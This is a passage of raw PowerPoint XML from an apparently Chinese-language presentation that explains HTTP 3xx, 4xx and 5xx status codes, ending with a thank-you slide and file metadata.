          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>302 Found 类似于301，但新的URL应该被视为临时性的替代，而不是永久性的。注意，在HTTP1.0中对应的状态信息是“Moved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Temporatily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>出现该状态代码时，浏览器能够自动访问新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，因此它是一个很有用的状态代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>注意这个状态代码有时候可以和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>替换使用。例如，如果浏览器错误地请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" u="sng" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://host/~user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，有的服务器返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>301</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，有的则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>严格地说，我们只能假定只有当原来的请求是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>时浏览器才会自动重定向。请参见</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>307</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>303 See Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>类似于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>301/302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，不同之处在于，如果原来的请求是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>头指定的重定向目标文档应该通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>提取。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>304 Not Modified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>客户端有缓冲的文档并发出了一个条件性的请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>一般是提供</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>If-Modified-Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>头表示客户只想比指定日期更新的文档</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>。服务器告诉客户，原来缓冲的文档还可以继续使用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>305 Use Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>客户请求的文档应该通过Location头所指明的代理服务器提取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>307 Temporary Redirect 和302(Found)相同。许多浏览器会错误地响应302应答进行重定向，即使原来的请求是POST，即使它实际上只能在POST请求的应答是303时 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>才能重定向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>由于这个原因，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>HTTP 1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>新增了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>307</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，以便更加清除地区分几个状态代码：当出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>303</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应答时，浏览器可以跟随重定向的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求；如果是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>307</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>应答，则浏览器只 能跟随对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求的重定向。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4xx </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>错误</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>4xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>客户端错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>400 Bad Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>请求出现语法错误。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>401 Unauthorized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>客户试图未经授权访问受密码保护的页面。应答中会包含一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>WWW-Authenticate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>头，浏览器据此显示用户名字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>密码对话框，然后在填写合适的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>头后再次发出请求。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384529729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843817"/>
            <a:ext cx="11346735" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>错误码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>4xx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>客户端错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>403 Forbidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>资源不可用。服务器理解客户的请求，但拒绝处理它。通常由于服务器上文件或目录的权限设置导致。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>404 Not Found </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>无法找到指定位置的资源。这也是一个常用的应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>405 Method Not Allowed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>请求方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GET、POST、HEAD、Delete、PUT、TRACE等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>对指定的资源不适用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>406 Not Acceptable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>指定的资源已经找到，但它的MIME类型和客户在Accpet头中所指定的不兼容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>407 Proxy Authentication Required 类似于401，表示客户必须先经过代理服务器的授权。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>408 Request Timeout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>在服务器许可的等待时间内，客户一直没有发出任何请求。客户可以在以后重复同一请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>409 Conflict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>通常和PUT请求有关。由于请求和资源的当前状态相冲突，因此请求不能成功</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>410 Gone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>所请求的文档已经不再可用，而且服务器不知道应该重定向到哪一个地址。它和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>的不同在于，返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>407</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表示文档永久地离开了指定的位置，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>表示由于未知的原因文档不可用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>411 Length Required </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器不能处理请求，除非客户发送一个Content-Length头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>412 Precondition Failed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>请求头中指定的一些前提条件失败</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>413 Request Entity Too Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>目标文档的大小超过服务器当前愿意处理的大小。如果服务器认为自己能够稍后再处理该请求，则应该提供一个Retry-After头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>414 Request URI Too Long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>URI太长</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>416 Requested Range Not Satisfiable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器不能满足客户在请求中指定的Range头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221574354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906D24-CF3A-4E1E-9315-0E6AE675B841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143339" y="157485"/>
            <a:ext cx="10081120" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914377"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="65000"/>
                    <a:lumOff val="35000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>七、检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1867" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B33C24C-856F-4223-B882-6C82E097D441}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="422632" y="843817"/>
            <a:ext cx="11346735" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>错误码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>5xx服务器错误</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>500 Internal Server Error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器遇到了意料不到的情况，不能完成客户的请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务端的程序错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>501 Not Implemented </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器不支持实现请求所需要的功能。例如，客户发出了一个服务器不支持的PUT请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>502 Bad Gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>服务器作为网关或者代理时，为了完成请求访问下一个服务器，但该服务器返回了非法的应答。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>503 Service Unavailable 服务器由于维护或者负载过重未能应答。例如，Servlet可能在数据库连接池已满的情况下返回503。服务器返回503时可以提供一个Retry-After头。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>504 Gateway Timeout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>由作为代理或网关的服务器使用，表示不能及时地从远程服务器获得应答</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>505 HTTP Version Not Supported </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>服务器不支持请求中所指明的HTTP版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357748221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38529" y="2852937"/>
            <a:ext cx="6372257" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>谢谢，敬请批评指正！</a:t>
            </a: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269</TotalTime>
  <Words>2776</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>618</Paragraphs>
  <Slides>95</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95</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="102" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>等线 Light</vt:lpstr>
      <vt:lpstr>方正姚体</vt:lpstr>
      <vt:lpstr>黑体</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Costanzo Sirius</dc:creator>
  <cp:lastModifiedBy>Costanzo Sirius</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-02T11:12:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-02T15:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>